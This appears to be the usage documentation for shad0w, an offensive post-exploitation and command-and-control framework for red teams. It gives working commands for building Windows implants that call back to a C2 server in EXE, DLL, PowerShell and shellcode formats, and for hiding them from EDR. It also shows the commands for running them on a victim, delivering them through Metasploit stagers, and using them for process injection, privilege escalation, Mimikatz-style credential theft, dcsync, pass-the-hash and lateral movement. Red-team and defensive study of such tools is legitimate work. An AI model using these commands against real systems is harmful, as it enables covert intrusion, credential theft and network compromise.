Home
Catching Meterpreter Callbacks
- File System
- Process Management
- Privilege Escalation
- In Memory Code Execution
- SOCKS Proxy
- Unmanaged PowerShell
- .NET Enumeration
- GhostPack
- BloodHound
- Mimikatz
- Kill a Beacon
Post exploitation is large part of a red team engagement. While many organizations begin to mature and start to deploy a wide range of sophisticated Endpoint Detection & Response (EDR) solutions onto their networks, it requires us as attackers to also mature. We need to upgrade our arsenal to give us the capabilities to successfully operate on advanced networks. This is why shad0w was built.
shad0w is a post exploitation framework that is designed to operate covertly on advanced networks, providing the operator with much greater control over their engagements. In the future, I will be working on implementing a teamserver and GUI clients along with some cool new features.
If you want to help with the development, feel free to make pull requests or DM me on twitter @batsec or on Discord at the Porchetta Industries server on the shad0w channel.
shad0w is designed to be ran inside of Docker. This will make life easier for the operator as it has some very specific dependencies which are required for it to function correctly.
sudo apt install -y docker.io
sudo systemctl enable docker --now
docker
In order for certain modules and scripts to run, shad0w must be installed in the /root/ directory.
cd /root/
git clone --recurse-submodules https://github.com/bats3c/shad0w.git
cd shad0w
sudo ./shad0w install
It takes about 10 minutes to build the Docker container.
Once the build is finished, you will be able to use the shad0w command. This command should be used to launch shad0w rather than running it manually via Docker.
shad0w --help
usage: shad0w [-h] {listen,beacon,update} ...
positional arguments:
{listen,beacon,update}
shad0w C2 functions
listen Tell shad0w to listen for connections
beacon Tell shad0w to create a beacon
update Update shad0w
optional arguments:
-h, --help show this help message and exit
shad0w implants are called beacons. There are two types of beacons:
- Secure beacons are designed to operate in environments where it is vital to remain undetected.
- Insecure beacons are for environments where security is much more relaxed.
shad0w beacon --help
usage: shad0w beacon [-h] -p PAYLOAD -H ADDRESS [-P PORT] [-j JITTER] -f {raw,exe,psh,dll} -o OUT [-n] [-d]
optional arguments:
-h, --help show this help message and exit
-p PAYLOAD, --payload PAYLOAD
Beacon payload to use
-H ADDRESS, --address ADDRESS
Address the beacon will connect to
-P PORT, --port PORT Port the beacon will connect on
-j JITTER, --jitter JITTER
Jitter the beacon should use when connecting back
-f {raw,exe,psh,dll}, --format {raw,exe,psh,dll}
Format to store the beacon payload as
-o OUT, --out OUT File to store the beacon in
-n, --no-shrink Leave the file at its final size, do not attempt to shrink it
-d, --debug Start debug mode
Beacons have two payload options:
- Staged payloads only contain a stub, which will download and execute the rest of the payload.
- Static payloads are self contained and store all the beacon code inside. This will cause the payload to be much larger in size.
There is also support for Metasploit reverse_https stagers, which will be covered in more detail later.
The payload is controlled with the -p flag. The format consists of arch / os / security / static.
To generate a 64-bit secure staged Windows beacon, the payload string would be x64/windows/secure.
To generate a static beacon, the payload string would be x64/windows/secure/static.
Currently there is only support for 64-bit Windows. In the future, there will be a much wider range of architectures and operating systems supported.
The IP address or domain that the beacon will callback to. This can either be a redirector or the C2 depending on your tradecraft. This option is set with the -H flag.
The port that the beacon will call back on. By default, this is set to 443. This option can be changed with the -P flag.
The delay between callbacks that the beacon will make. By default, this is set to 1 second. This option can be changed with the -j flag.
The format of the beacon. Currently there are 4 different formats: EXE, DLL, PowerShell and ShellCode. They correspond to exe, dll, psh and raw respectively. This option is set with the -f flag.
The file used to store the generated beacon. This option is set with the -o flag.
Because of the JSON library that the beacons uses, the file size can be quite big. To reduce the file size, the EXE will be compressed via UPX. Obfuscation methods are then leveraged to hide the fact that UPX was used. To skip this stage, use the -n flag.
To compile the beacon in debug mode, use the -d flag.
Generate a secure staged beacon in EXE format.
shad0w beacon -p x64/windows/secure -H 192.168.0.20 -f exe -o update-staged.exe
The secure payload makes heavy use of new Windows features and ntdll API hooking. This can
make the payload a lot more resistant to EDR products, but can also make it more unstable.
It has been tested on:
x64 Windows 8.1, x64 Windows 10 (Pro & Enterprise)
x64 Windows Server 2019
It may work on other systems as well.
[+] Created update.exe (340992 bytes)
Generate a secure static beacon in EXE format.
shad0w beacon -p x64/windows/secure/static -H 192.168.0.20 -f exe -o update.exe
The secure payload makes heavy use of new Windows features and ntdll API hooking. This can
make the payload a lot more resistant to EDR products, but can also make it more unstable.
It has been tested on:
x64 Windows 8.1, x64 Windows 10 (Pro & Enterprise)
x64 Windows Server 2019
It may work on other systems as well.
Static payloads can be very large and much easier to detect. For use in droppers, loaders,
exploits, etc, staged payloads are recommended as they are much smaller and easier to use.
[+] Created update.exe (673792 bytes)
Generate a secure static beacon in DLL format.
Size: 753648 bytes
This payload can be used for persistence or DLL hijacking.
shad0w beacon -p x64/windows/secure/static -H 192.168.0.20 -f dll -o update.dll
To execute locally on the victim:
C:\Users\lee\Downloads>rundll32 update.dll,x
You will see a pop-up error message. If you click on OK, you will lose your beacon.
This method is just for testing the payload and is not for use in the real world.
Generate a secure static beacon in PowerShell format.
Size: 3263906 bytes
shad0w beacon -p x64/windows/secure/static -H 192.168.0.20 -f psh -o update.ps1
To execute locally on the victim:
C:\Users\lee\Downloads>powershell -nop -exec bypass
PS C:\Users\lee\Downloads>.\update.ps1
Generate a secure static beacon in ShellCode format.
Size: 661664 bytes
shad0w beacon -p x64/windows/secure/static -H 192.168.0.20 -f raw -o update.bin
Generate a secure staged beacon in ShellCode format.
Size: 336080 bytes
shad0w beacon -p x64/windows/secure -H 192.168.0.20 -f raw -o update-staged.bin
Each user must spin up their own C2 instance. This is done by using the listen argument when calling shad0w.
shad0w listen --help
usage: shad0w listen [-h] [-a ADDRESS] [-p PORT] [-k KEY] [-c CERT] [-m MIRROR] [-d] [-e ENDPOINT]
optional arguments:
-h, --help show this help message and exit
-a ADDRESS, --address ADDRESS
Address shad0w will listen on (default will be 0.0.0.0)
-p PORT, --port PORT Port the C2 will bind to (default is 443)
-k KEY, --key KEY Private key for the HTTPS server
-c CERT, --cert CERT Certificate for the HTTPS server
-m MIRROR, --mirror MIRROR
Website to mirror for if a client connects to the C2 via a web browser
-d, --debug Start debug mode
-e ENDPOINT, --endpoint ENDPOINT
The endpoint shad0w modules will callback to
The IP address that the C2 will listen on. This option is set with the -a flag.
The port that the C2 will listen on. This option is set with the -p flag.
By using the -k flag, you are able to tell the C2 to use different keys. You are also able generate new defaults by running make in the certs directory.
By using the -c flag, you are able to tell the C2 to use different certificates. You are also able generate new defaults by running make in the certs directory.
The C2 provides the ability to live proxy a website. If connected to by a web browser, the C2 will proxy all content to and from the website its mirroring. This option is set with the -m flag.
This option is set with the -d flag.
The first place the beacon will callback to. This can either be a redirector or the C2 depending on your tradecraft. This should be the same option you set for -H when creating a beacon. This option is set with the -e flag.
It takes about 10 seconds to compile fresh payloads for use with stagers and exploits.
shad0w listen -e 192.168.0.20
███████╗██╗ ██╗ █████╗ ██████╗ ██████╗ ██╗ ██╗
██╔════╝██║ ██║██╔══██╗██╔══██╗██╔═████╗██║ ██║
███████╗███████║███████║██║ ██║██║██╔██║██║ █╗ ██║
╚════██║██╔══██║██╔══██║██║ ██║████╔╝██║██║███╗██║
███████║██║ ██║██║ ██║██████╔╝╚██████╔╝╚███╔███╔╝
╚══════╝╚═╝ ╚═╝╚═╝ ╚═╝╚═════╝ ╚═════╝ ╚══╝╚══╝
[i] Starting HTTPS server (0.0.0.0:443)
shad0w ≫
No Active Beacon
Instead of rewriting every Metasploit exploit and auxiliary module, I figured the more sane option would be to add support for Metasploit stagers. This allows you to load a shad0w beacon instead of Meterpreter. Doing this only requires a couple of extra steps.
- Make sure the LHOST and LPORT options point to the shad0w C2.
- Disable the default Metasploit payload handler.
- Set the exit function to none.
- Set the StagerURILength. This is important so that the C2 will be able to identify a Meterpreter stager callback. It can be set to any value. but you must remember it.
- It is only possible to stage a shad0w beacon over
reverse_httpsstagers. The payload will need to be set to this.
msf6 > set DisablePayloadHandler true
msf6 > set EXITFUNC none
msf6 > set StagerURILength 1337
msf6 > set payload windows/x64/meterpreter/reverse_https
- Set the MsfUriSize variable in shad0w to the same value as StagerURILength in Metasploit.
shad0w ≫ set -v MsfUriSize -d 1337
When the Metasploit module is ran, if it executes successfully you will be receive a shad0w beacon.
Use beacons to list and interact with beacons.
Use the -i flag followed by a beacon number to interact with a particular beacon.
When you interact with a beacon, a white bar at the bottom of the Terminal will appear containing information about the beacon.
Use help to show the available commands.
Shad0w uses Linux style commands to interact with a target's file system.
Use ls to list files in a directory.
Use cd to change the current directory.
Use pwd to print the current working directory and rm to delete files.
Use mkdir to create a new directory.
It is important once you have an active beacon that you are not confined to a single process. Shad0w allows you to list, migrate and spawn new beacons and processes.
Use getpid to show information about the current process a beacon is running in.
Use ps to show the current processes.
Use migrate with the -p flag and a process number to migrate the current beacon to a new process.
Use binject with the -p flag and a process number to inject a new copy of the current beacon into another process.
Use shinject and dllinject to inject both raw shellcode and DLLs into a process.
shad0w(SYSTEM@DC01) ≫ shinject -p 8725 -f shellcode.bin
shad0w(SYSTEM@DC01) ≫ dllinject -p 4267 -f yourfile.dll
Use elevate with the following flags for privilege escalation:
- -l to list available exploits.
- -c to check if the target is vulnerable to an exploit.
- -u to use an exploit on a target.
Use execute to execute .NET assemblies, DLLs, EXEs, JS, VBS or XSL files in memory.
The file must be passed with the -f flag and any arguments with the -p flag.
A slightly custom version of SharpSocks is currently used for SOCKS proxying.
Use the -q flag to setup a quick SOCKS connection.
Using the server and listen arguments, it is possible to create much more complex SOCKS connection.
Use psh for unmanaged PowerShell execution. This option is very flexible and allows you to perform a wide range of actions.
Use the -c flag to execute a single PowerShell query.
Use the -l flag to list the currently available modules.
Additional modules can be added by placing them in the scripts directory and rebuilding shad0w.
Use the -m flag to import modules. This will host the modules on a random path on the C2. The module will then be downloaded and invoked before the command specified with the -c flag is executed.
Use the -i flag to get information about modules.
Use dotnet to list the available .NET versions.
There are modules for all of the GhostPack binaries:
- rubeus
- safetykatz
- seatbelt
- sharpchrome
- sharpdpapi
- sharpdump
- sharpup
- sharpwmi
This will allows you to run them from a single command, without having to execute anything.
Using these modules, it is possible to perform a wide range of lateral movement techniques.
There is BloodHound support via the sharphound command. Like all modules, it supports all the command line switches of the original program.
Once sharphound has run, use download to download the output.
This option extends features even further allowing you to perform actions such as dcsync and pth.
Use die to kill a beacon. You will receive a warning. When you provide the -y command the beacon will be killed.
